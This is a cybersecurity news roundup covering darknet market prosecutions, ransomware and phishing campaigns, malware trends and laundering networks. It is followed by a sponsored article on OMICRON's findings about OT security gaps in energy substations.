“During that time, the online market facilitated more than four million transactions between vendors and buyers valued at more than $430 million, making it one of the largest dark web marketplaces of its kind at the time,” the DoJ said . “The illegal products and services available on the site included controlled substances, compromised or stolen account credentials, stolen personally identifying information, counterfeit currency, and computer-hacking tools. Sales of controlled substances were the most prevalent activity, with net drug sales totaling nearly $375 million over the life of the site.” Hamilton agreed to forfeit certain ill-gotten proceeds, including about 1,230 bitcoin and 24.4 Ether, as well as three properties in Virginia. Pavey, 40, pleaded guilty last year to a federal drug conspiracy charge and admitted his role in creating and operating Empire Market.
He is currently awaiting sentencing. Darknet operator admits role Slovakian Man Pleads Guilty to Operating Darknet Market Alan Bill , 33, of Bratislava, has pleaded guilty to his involvement in a darknet market called Kingdom Market that sold drugs and stolen personal information between March 2021 and December 2023. Bill has also admitted to receiving cryptocurrency from a wallet associated with Kingdom, in addition to assisting with the creation of Kingdom’s forum pages on Reddit and Dread and having access to Kingdom usernames that made postings on behalf of Kingdom on social media accounts. As part of his plea agreement, Bill has agreed to forfeit five different types of coins in a cryptocurrency wallet, as well as the Kingdommarket[.]live and Kingdommarket[.]so domains, which have been shut down by authorities.
Bill is scheduled to be sentenced on May 5, 2026. “Bill was arrested December 15, 2023, at Newark Liberty International Airport after a customs inspection found two cellular telephones, a laptop, a thumb drive, and a hardware wallet used to store cryptocurrency private keys,” the DoJ said . “The electronics contained evidence of his involvement with Kingdom.” Android theft defenses expanded Google Announces New Anti-Theft Features for Android Google has announced an expanded set of Android theft-protection features that build upon existing protections like Theft Detection Lock and Offline Device Lock introduced in 2024 . The features are available for Android devices running Android 16+.
Chief among them are granular controls to enable or disable Failed Authentication Lock, which automatically locks the device’s screen after excessive failed authentication attempts. Other notable updates include extending Identity Check to cover all features and apps that use the Android Biometric Prompt, stronger protections against attempts to guess PIN, pattern, or password by increasing the lockout time after failed attempts, and adding an optional security question to initiate a Remote Lock so as to ensure that it’s being done by the real device owner. “These protections are designed to make Android devices harder targets for criminals before, during, and after a theft attempt,” Google said. AI-linked malware tooling spotted New Malware Delivering PureRAT Shows Signs of AI A PureRAT campaign has targeted job seekers using malicious ZIP archives either attached in emails or shared as links pointing to Dropbox that, when opened, leverage DLL side-loading to launch a batch script that’s responsible for executing the malware.
In a new analysis, Broadcom’s Symantec and Carbon Black Threat Hunter Team said there are signs these tools, including the batch script, have been authored using artificial intelligence (AI). “Multiple tools used by the attacker bear hallmarks of having been developed using AI, such as detailed comments and numbered steps in scripts, and instructions to the attacker in debug messages,” it said . “Virtually every step in the batch file has a detailed comment in Vietnamese.” It’s suspected that the threat actor behind the actor is based in Vietnam and is likely selling access to compromised organizations to other actors. UK–China cyber talks launched U.K.
and China Establish Cyber Dialogue The U.K. and China have established a forum called Cyber Dialogue to discuss cyber attacks for security officials from the two nations to manage threats to each other’s national security. The deal, according to Bloomberg , is a way to “improve communication, allow private discussion of deterrence measures and help prevent escalation.” The U.K. has previously called out Chinese threat actors for targeting its national infrastructure and government systems.
As recently as this week, The Telegraph reported that Chinese nation-state threat actors have hacked the mobile phones of senior U.K. government members since 2021. Poor OPSEC unmasks broker Who is r1z? Earlier this month, Jordanian national Feras Khalil Ahmad Albashiti pleaded guilty to charges of selling access to the networks of at least 50 companies through a cybercriminal forum.
Albashiti, who also went by the online aliases r1z, secr1z, and j0rd4n14n, is said to have made 1,600 posts across multiple forums, including XSS, Nulled, Altenen, RaidForums, BlackHatWorld, and Exploit. On LinkedIn, Albashiti described himself as an information technology architect and consultant, claiming experience in cyber threats, cloud, network, web, and penetration testing. The kicker? His LinkedIn profile URL was “linkedin[.]com/in/r1z.” “The actor’s website, sec-r1z.com, was created in 2009, and based on WHOIS information, also reveals personal details of Firas, including the same Gmail address, alongside additional details like address and phone number,” KELA said .
“The r1z case shows how initial access brokers monetize firewall exploits and enterprise access at scale, while the actor’s OPSEC failures leave long-term attribution trails that expose the ransomware supply chain.” Encryption flaw traps victims Flaw in Vibe-Coded Sicarii Ransomware Cybersecurity company Halcyon said it identified a critical flaw in the encryption process of Sicarii , a newly discovered ransomware strain, that makes data recovery impossible even if an impacted organization pays a ransom. “During execution, the malware regenerates a new RSA key pair locally, uses the newly generated key material for encryption, and then discards the private key,” the company said . “This per-execution key generation means encryption is not tied to a recoverable master key, leaving victims without a viable decryption path and making attacker-provided decryptors ineffective for affected systems.” It’s assessed with moderate confidence that the threat actors used AI-assisted tooling that may have led to the implementation error. Human-in-the-loop MFA bypass Live Phishing Panels Used in New Attacks Google-owned Mandiant said it’s tracking a fresh wave of voice-phishing attacks targeting single sign-on tools that are resulting in data theft and extortion attempts.
Multiple threat actors are said to be combining voice calls and custom phishing kits, including a group identifying itself as ShinyHunters, to obtain unauthorized access and enroll threat actor-controlled devices into victim multi-factor authentication (MFA) for persistent access. Upon gaining access, the threat actors have been found to pivot to SaaS environments to exfiltrate sensitive data. It’s unclear how many organizations have been impacted by the campaign. In a similar alert, Silent Push said SSO providers are being targeted by a massive identity-theft campaign across more than 100 high-value enterprises.
The activity leverages a new Live Phishing Panel that allows a human attacker to sit in the middle of a login session, intercept credentials, and gain persistent access. The hackers have set up fake domains targeting these companies, but it’s not known whether they have actually been targeted or whether their attempts to gain access to systems were successful. Some of the companies impacted include Crunchbase, SoundCloud, and Betterment , per Hudson Rock’s co-founder and CTO Alon Gal. “This isn’t a standard automated spray-and-pray attack; it is a human-led, high-interaction voice phishing (‘vishing’) operation designed to bypass even hardened Multi-Factor Authentication (MFA) setups,” Silent Push noted .
React flaw fuels crypto-mining attacks React2Shell Exploited to Target Russian Firms Threat actors have exploited the recently disclosed security flaw in React Server Components (CVE-2025-55182 aka React2Shell ) to infect Russian companies with XMRig-based cryptominers, per BI.ZONE. Other payloads deployed as part of the attacks include botnets such as Kaiji and Rustobot , as well as the Sliver implant. Russian companies in the housing, finance, urban infrastructure and municipal services, aerospace, consumer digital services, chemical industry, construction, and production sectors have also been targeted by a suspected pro-Ukrainian threat group called PhantomCore that employs phishing containing ZIP attachments to deliver a PowerShell malware that’s similar to PhantomRemote . Malware flood hits open source Sonatype Flagged 454K Malware Packages in 2025 Supply chain security company Sonatype said it logged 454,600 open-source malware packages in 2025, taking the total number of known and blocked malware to over 1.233 million packages across npm, PyPI, Maven Central, NuGet, and Hugging Face.
The threat is compounded by AI agents confidently recommending nonexistent versions or malware-infected packages, exposing developers to new risks like slop squatting. “The evolution of open source malware crystallized, evolving from spam and stunts into sustained, industrialized campaigns against the people and tooling that build software,” it said . “The next frontier of software supply chain attacks is not limited to package managers. AI model hubs and autonomous agents are converging with open source into a single, fluid software supply chain — a mesh of interdependent ecosystems without uniform security standards.” Ransomware ecosystem doubles Ransomware Attacks Climbed in 2025 A new analysis from Emsisoft revealed that ransomware groups had a massive year in 2025, claiming between 8,100 and 8,800 victims, significantly up from about 5,300 in 2023.
“As the number of victims has grown, so has the number of ransomware groups,” the company said . The number of active groups has surged from about 70 in 2023 to nearly 140 in 2025. Qilin, Akira, Cl0p, and Play emerged as some of the most active players in the landscape. “Law enforcement efforts are working—they are fragmenting major groups, forcing shutdowns, and creating instability at the top.
Yet this disruption has not translated into fewer victims,” Emsisoft said. “Instead, ransomware has become more decentralized, more competitive, and more resilient. As long as affiliates remain plentiful and social engineering remains effective, victim counts are likely to continue rising.” ATM malware ring charged U.S. Ramps Up Actions Against ATM Jackpotting Attacks The DoJ has announced charges against an additional 31 individuals accused of being involved in a massive ATM jackpotting scheme that resulted in the theft of millions of dollars.
The attacks involve the use of malware called Ploutus to hack into ATMs and force them to dispense cash. Between February 2024 and December 2025, the gang stole at least $5.4 million from at least 63 ATMs, most of which belonged to credit unions, the DoJ alleged. Many of the defendants charged in this Homeland Security Task Force operation are Venezuelan and Colombian nationals, including illegal alien Tren de Aragua (TdA) members, the DoJ said, adding 56 others have already been charged. “A large ring of criminal aliens allegedly engaged in a nationwide conspiracy to enrich themselves and the TdA terrorist organization by ripping off American citizens,” said Deputy Attorney General Todd Blanche.
“The Justice Department’s Joint Task Force Vulcan will not stop until it completely dismantles and destroys TdA and other foreign terrorists that import chaos to America.” Blockchain-based C2 evasion DeadLock Ransomware Uses Smart Contracts to Evade Detection A ransomware strain called DeadLock , which was first detected in the wild in July 2025, has been observed using Polygon smart contracts for proxy server address rotation or distribution. While the exact initial access vectors used by the ransomware are not known, it drops an HTML file which acts as a wrapper for Session, an end-to-end encrypted and decentralized instant messenger. The HTML is used to facilitate direct communication between the DeadLock operator and the victim by sending and receiving messages from a server that acts as a middleware or proxy. “The most interesting part of this is how server addresses are retrieved and managed by DeadLock,” Group-IB noted , stating it “uncovered JS code within the HTML file that interacts with a smart contract over the Polygon network.” This list contains the available endpoints for interacting with the Polygon network or blockchain and obtaining the current proxy URL via the smart contract.
DeadLock also stands apart from traditional ransomware operations in that it lacks a data leak site to publicize the attacks. However, it uses AnyDesk as a remote management tool and leverages a previously unknown loader to exploit the Baidu Antivirus driver (“BdApiUtil.sys”) vulnerability (CVE-2024-51324) to conduct a bring your own vulnerable driver (BYOVD) attack and disable endpoint security solutions. According to Cisco Talos , it’s believed that the threat actor leverages the compromised valid accounts to gain access to the victim’s machine. Crypto laundering networks scale up Chinese Money Launderers Drive Illicit Crypto Economy In a report published this week, Chainalysis said Chinese-language money laundering networks (CMLNs) are dominating known crypto money laundering activity, processing an estimated 20% of illicit cryptocurrency funds over the past five years.
“CMLNs processed $16.1 billion in 2025 – approximately $44 million per day across 1,799+ active wallets,” the blockchain intelligence firm said . “The illicit on-chain money laundering ecosystem has grown dramatically in recent years, increasing from $10 billion in 2020 to over $82 billion in 2025.” These networks launder funds using a variety of mechanisms, including gambling platforms, money movement, and peer-to-peer (P2P) services that process fund transfers without know your customer (KYC) checks. CLMNs have also processed an estimated 10% of funds stolen in pig butchering scams, an increase coinciding with the decline in the use of centralized exchanges. This is complemented by the emergence of guarantee marketplaces like HuiOne and Xinbi that function primarily as marketing venues and escrow infrastructure for CMLNs.
“CMLNs’ advertising on these guarantee services offer a range of money laundering techniques with the primary goal of integrating illicit funds into the legitimate financial system,” Chainalysis said. SMS fraud hits Canadians Fraud Campaigns Target Canada Threat actors are impersonating government services and trusted national brands in Canada, often using lures related to traffic fines, tax refunds, airline bookings, and parcel delivery alerts in SMS messages and malicious ads to enable account takeovers and direct financial fraud by directing them to phishing landing pages. “A significant portion of the activity is aligned with the ‘PayTool’ phishing ecosystem, a known fraud framework that specializes in traffic violation and fine payment scams targeting Canadians through SMS-based social engineering,” CloudSEK said . Seen together, these stories show problems building slowly, not all at once.
The same gaps are being used again and again until they work. Most of this didn’t start this week. It’s growing, spreading, and getting easier for attackers to repeat. The full list helps show where things are heading before they become normal.
Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Survey of 100+ Energy Systems Reveals Critical OT Cybersecurity Gaps
A study by OMICRON has revealed widespread cybersecurity gaps in the operational technology (OT) networks of substations, power plants, and control centers worldwide. Drawing on data from more than 100 installations, the analysis highlights recurring technical, organizational, and functional issues that leave critical energy infrastructure vulnerable to cyber threats. The findings are based on several years of deploying OMICRON’s intrusion detection system (IDS) StationGuard in protection, automation, and control (PAC) systems. The technology, which monitors network traffic passively, has provided deep visibility into real-world OT environments.
The results underscore the growing attack surface in energy systems and the challenges operators face in securing aging infrastructure and complex network architectures. Connection of an IDS in PAC systems (circles indicate mirror ports) StationGuard deployments, often carried out during security assessments, revealed vulnerabilities such as unpatched devices, insecure external connections, weak network segmentation, and incomplete asset inventories. In many cases, these security weaknesses were identified within the first 30 minutes of connecting to the network. Beyond security risks, the assessments also uncovered operational issues like VLAN misconfigurations, time synchronization errors, and network redundancy problems.
In addition to technical shortcomings, the findings point to organizational factors that contribute to these risks — including unclear responsibilities for OT security, limited resources, and departmental silos. These findings reflect a growing trend across the energy sector: IT and OT environments are converging rapidly, yet security measures often fail to keep pace. How are utilities adapting to these complex risks, and what gaps remain that could leave critical systems exposed? Why OT Networks Need Intrusion Detection The ability to detect security incidents is an integral part of most security frameworks and guidelines, including the NIST Cybersecurity Framework, IEC 62443, and the ISO 27000 standard series.
In substations, power plant control systems, and control centers, many devices operate without standard operating systems, making it impossible to install endpoint detection software. In such environments, detection capabilities must be implemented at the network level. OMICRON’s StationGuard deployments typically use network mirror ports or Ethernet TAPs to passively monitor communication. Besides detecting intrusions and cyber threats, the IDS technology provides key benefits, including: Visualization of network communication Identification of unnecessary services and risky network connections Automatic asset inventory creation Detection of device vulnerabilities based on this inventory Assessing Risks: Methodology Behind the Findings The report is based on years of IDS installations.
The first installation dates back to 2018. Since then, several hundred installations and security assessments have been conducted at substations, power plants, and control centers in dozens of countries. The findings are grouped into three categories: Technical security risks Organizational security issues Operational and functional problems In most cases, critical security and operational issues were detected within minutes of connecting the IDS to the network. Typically, sensors were connected to mirror ports on OT networks, often at gateways and other critical network entry points, to capture key communication flows.
In many substations, bay-level monitoring was not required, as multicast propagation made the traffic visible elsewhere in the network. Hidden Devices and Asset Blind Spots Accurate asset inventories are essential for securing complex energy systems. Creating and maintaining such directories manually is time-consuming and error-prone. To address this, OMICRON used both passive and active methods for automated asset discovery.
Passive asset identification relies on existing system configuration description (SCD) files, standardized under IEC 61850-6, which contain detailed device information. However, passive monitoring alone proved insufficient in many cases, as essential data such as firmware versions are not transmitted in normal PAC communication. Active querying of device information , on the other hand, leverages the MMS protocol to retrieve nameplate data such as device names, manufacturers, model numbers, firmware versions, and sometimes even hardware identifiers. This combination of passive and active techniques provided a comprehensive asset inventory across installations.
Example of device information retrievable via SCL and MMS active querying Which Technical Cybersecurity Risks Are Most Common? OMICRON’s analysis identified several recurring technical issues across energy OT networks: Vulnerable PAC devices: Many PAC devices were found to be operating with outdated firmware containing known vulnerabilities. A notable example is the CVE-2015-5374 vulnerability, which allows a denial-of-service attack on protective relays with a single UDP packet. Although patches have been available since 2015, numerous devices remain unpatched.
Similar vulnerabilities in GOOSE implementations and MMS protocol stacks pose additional risks. Risky external connections: In several installations, undocumented external TCP/IP connections were found, in some cases exceeding 50 persistent connections to external IP addresses in a single substation. Unnecessary insecure services: Common findings included unused Windows file sharing services (NetBIOS), IPv6 services, license management services running with elevated privileges, and unsecured PLC debugging functions. Weak network segmentation: Many facilities operated as a single large flat network, allowing unrestricted communication between hundreds of devices.
In some cases, even office IT networks were reachable from remote substations. Such architectures significantly increase the impact radius of cyber incidents. Unexpected devices: Untracked IP cameras, printers, and even automation devices frequently appeared on networks without being documented in asset inventories, creating serious blind spots for defenders. The Human Factor: Organizational Weaknesses in OT Security Beyond technical flaws, OMICRON also observed recurring organizational challenges that exacerbate cyber risk.
These include: Departmental boundaries between IT and OT teams Lack of dedicated OT security personnel Resource constraints are limiting the implementation of security controls In many organizations, IT departments remain responsible for OT security — a model that often struggles to address the unique requirements of energy infrastructure. When Operations Fail: Functional Risks in Substations The IDS deployments also revealed a range of operational problems unrelated to direct cyber threats but still affecting system reliability. The most common were: VLAN issues were by far the most frequent, often involving inconsistent VLAN tagging of GOOSE messages across the network. RTU and SCD mismatches led to broken communication between devices, preventing SCADA updates in several cases.
Time synchronization errors ranged from simple misconfigurations to devices operating with incorrect time zones or default timestamps. Network redundancy issues involving RSTP loops and misconfigured switch chips caused severe performance degradation in some installations. These operational weaknesses not only impact availability but can also amplify the consequences of cyber incidents. Functional monitoring related alert messages What Can Utilities Learn from These Findings?
The analysis of over 100 energy facilities highlights the urgent need for robust, purpose-built security solutions that are designed for the unique challenges of operational technology environments. With its deep protocol understanding and asset visibility, the StationGuard Solution provides security teams with the transparency and control needed to protect critical infrastructure. Its built-in allowlisting detects even subtle deviations from expected behavior, while its signature-based detection identifies known threats in real time. The system’s ability to monitor both IT and OT protocols — including IEC 104, MMS, GOOSE, and more — allows utilities to detect and respond to threats at every layer of their substation network.
Combined with features like automated asset inventories, role-based access control, and seamless integration into existing security workflows, StationGuard enables organizations to strengthen resilience without disrupting operations. To learn more about how StationGuard supports utilities in closing these critical security gaps, visit our website . StationGuard Solution Found this article interesting? This article is a contributed piece from one of our valued partners.
Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.